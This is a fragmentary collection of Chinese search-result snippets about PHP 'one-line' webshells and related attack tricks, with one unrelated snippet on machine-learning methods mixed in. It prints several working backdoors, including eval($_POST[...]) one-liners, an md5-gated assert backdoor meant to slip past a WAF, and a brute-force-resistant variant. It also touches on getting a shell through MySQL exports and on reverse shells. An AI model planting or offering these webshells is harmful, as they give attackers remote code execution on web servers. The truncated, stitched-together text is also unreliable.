1.mysql執行語句拿shell 2.利用md5繞過waf <?php if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?> ...

PHP一句話：1、普通一句話 <!--?php @eval($_POST['ki11']);?--> 2、防爆破一句話 <!--?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['ki11 ...

很老的東西了，但是很多時候會派上用場 mysql一句話導出shell Drop TABLE IF EXISTS temp; //如果存在temp就刪掉Create TABLE temp ...

em，是一種含有隱含變量的概率模型參數的極大似然估計法。主要應用在機器學習以及計算機視覺的數據聚類領域。 lr，邏輯回歸，本質也是線性回歸，通過擬合擬合樣本的某個曲線，然后使用邏輯函數進行區間縮放， ...

反彈shell背景： 想要搞清楚這個問題，首先要搞清楚什么是反彈，為什么要反彈。假設我們攻擊了一台機器，打開了該機器的一個端口，攻擊者在自己的機器去連接目標機器（目標ip：目標機器端口），這是比較常規的形式，我們叫做正向連接。遠程桌面，web服務，ssh，telnet ...

一、基礎類的一句話--功能僅限於驗證漏洞了，實際中太容易被查出出來： 相信一目了然可以看懂如何使用這類一句話。 如果有疑問可以看我的博客PHP后門的eval類和system類 函數到底有哪些區別 二、編碼的替換的類型： 三、亂七八糟類型 ...

...

<?php @eval($_POST[pp]);?> 這是一段PHP木馬代碼，也就是我們所說的后門程序 為什么說這段代碼是后門程序？ 其實這段代碼屬於基礎類的一句話，功能僅限於驗證漏洞了，實際中太容易被查出來了， 這個是PHP最常見的一句話木馬的源碼，通過post木馬程序來實現 ...